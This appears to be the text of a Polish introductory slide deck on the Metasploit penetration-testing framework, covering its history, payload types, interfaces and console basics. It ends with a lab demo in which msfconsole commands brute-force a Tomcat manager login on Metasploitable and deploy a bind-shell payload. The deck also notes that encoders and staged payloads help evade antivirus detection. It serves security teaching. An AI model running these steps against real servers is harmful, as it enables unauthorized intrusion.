Metasploit Part 1 The Beginning
Co to jest Metasploit? Historiia Terminologia Rodzaje Payload ów Opisy modułów Podstawy Konsoli Agenda
Metasploit... czyli? Framework do pentestów Napisany w Ruby Zawiera w sobie: Exploity, Payloads, Auxiliaries, Automation Tools, i wiele innych... Wieloplatformowy Wsparcie Developerów Możliwośd pisania własnych wtyczek OpenSource weeeee... :]
A little bit about this shit Metasploit zostal przygotowany w 2003 roku w jezyku Perl. Od wersji 3.0 zostal calkowicie przepisany w jezyku Ruby. Srodowisko moze byc uruchamiane na wielu wersjach systemu Unix i Linux oraz w systemie Windows. W pazdzierniku 2009 projekt Metasploit zostal przejety przez firme Rapid 7 specjalizujaca sie w oprogramowaniu do zarzadzania podatnosciami systemów. (WiKi)
Terminologia Exploit (eksploatowad kogoś lub coś) The vector for getting into the system, whether it be because of a vulnerability or a bad config Payload (Ładunek) What you want the exploit to do.
Encoders (Programy szyfrujące) Ways to mangle the code so anti-malware apps won t detect the payload Auxillary (pomocniczy) Just another fun little app that comes with Metasploit (IRONGEEK)
Rodzaje PayLoad ów - Inline All the shellcode to be executed goes with the payload. More stable, but may be too big. - Staged (pl. Stopniowanie) The payload is just a small stub that grabs the rest of the shell code after the exploit works. Smaller, and less for AV to grab a hold of.
-Reverse Instead of having to establish a connection in after an exploit works, the payload connects back you. This has a better chance of getting around firewalls with weak egress filtering. - NoNX These payloads try to work around things like DEP (Data Execution Prevention) (IRONGEEK)
Ale Metasploit to nie... Czasem schemat używania to: 1. Ustawid rodzaj exploit a 2. Ustawid rodzaj payload a 3. Ustawid cel naszej zabawy 4. Iśd po piwo... 5. Cieszyd się kontrolą ;] To nie wszystko co potrafi Metasploit... On potrafi wiele więcej...
MsfConsole: Piękny Prosty Interfejs
MsfCli: Piękny Prosty Interfejs
MsfGui: Piękny Prosty Interfejs
Piękny Prosty Interfejs
MsfWEB: Piękny Prosty Interfejs
A teraz zalety i wady MsfConsole: + Najlepiej wspierany interfejs frameworka + Prawie wszystkie opcje są dostępne - Nie jako "wskaż i kliknij w msggui / msfweb Msfcli + Łatwo dodad dobrodziejstwa metasploita do własnego skryptu - Nie jest tak dobrze wspierany jak msfconsole - Cięższy do użycia
A teraz zalety i wady Msfweb +Fajny Interfejs +Łatwy do zrozumienia treści +Dobry do pokazania prostych ataków -Nie jest tak dobrze wspierany jak msfconsole -Wolny Msfgui + Fajny Interfejs + Własne skórki (IRONGEEK)
Polecenia: help search set setg show (options/advanced/etc) exploit/run sessions l sessions -i 1 Podstawy Konsoli
Demo Sytuacja 1: Serwer Ubuntu Hacker
BackTrack w wersji 5 Metasploit 3.7.0 Nmap Metasploitable Używane rzeczy
Atak cz. 1 Skan sieci w poszukiwaniu hosta: $~> nmap v sn 192.168.10.0/24 Skan hosta nmapem Atak 1
Atak cz. 1 msf > use scanner/http/tomcat_mgr_login msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable msf auxiliary(tomcat_mgr_login) > set RPORT 8180 msf auxiliary(tomcat_mgr_login) > exploit
Rezultat: mamy login i hasło Cel: zdobyd shell ;] Atak cz. 1
Atak cz. 2 msf > use multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat msf exploit(tomcat_mgr_deploy) > set RPORT 8180 msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp msf exploit(tomcat_mgr_deploy) > exploit
Atak cz. 2 Posiadamy shella, więc możemy dalej psocid.
Metasploit Part 1 Q&A The Beginning
Linki (WiKi) http://wikipedia.pl (IRONGEEK) http://irongek.com http://www.offensive-security.com/metasploit-unleashed/ http://www.metasploit.com/ http://backtrack-linux.org
Metasploit Part 1 THX ;] The Beginning